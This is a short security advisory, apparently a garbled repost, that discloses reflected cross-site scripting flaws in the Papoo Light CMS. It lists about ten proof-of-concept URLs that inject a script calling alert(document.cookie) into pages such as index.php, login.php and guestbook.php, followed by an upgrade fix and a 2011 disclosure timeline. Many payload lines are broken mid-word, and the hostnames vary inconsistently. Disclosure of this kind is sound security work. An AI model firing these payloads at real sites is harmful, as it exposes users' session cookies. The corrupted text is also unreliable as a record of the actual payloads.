Defect Overview:
======================================
The CMS Papoo Light Version contains xss Defects
============================
Technical analysis:
============================
Http://www.bkjia.com/papoo/papoo_light/index. php/"> </a> <script> alert (document
. Cookie); </script>
Http://vip.2cto.com/papoo/papoo_light/kontakt. php/"> </a> <script> alert (volume E
Nt. cookie); </script>
Http://bbs.2cto.com/papoo/papoo_light/inhalt. php/"> </a> <script> alert
T. cookie); </script>
Http://www.honhei.com/papoo/papoo_light/forum. php/"> </a> <script> alert (document
. Cookie); </script>
Http://www.bkjia.com/papoo/papoo_light/guestbook. php/"> </a> <script> alert (docu
Ment. cookie); </script>
Http://www.bkjia.com/papoo/papoo_light/account. php/"> </a> <script> alert
Nt. cookie); </script>
Http://www.bkjia.com/papoo/papoo_light/login. php/"> </a> <script> alert (document
. Cookie); </script>
Http://www.bkjia.com papoo/papoo_light/index/"> </a> <script> alert (document. coo
Kie); </script>
Http://www.bkjia.com/papoo/papoo_light/forumthread. php/"> </a> <script> alert (do
Cument. cookie); </script>
Http://www.bkjia.com/papoo/papoo_light/forum/"> </a> <script> alert (document. coo
Kie); </script>
==========
Solution:
==========
Upgrade to the latest version.
================================
Disclosure Timeline:
================================
12-Sep-2011-informed the developers
12-Sep-2011-release date of this security advisory
12-Sep-2011-response and fix by vendor
12-sep-2011-post on BugTraq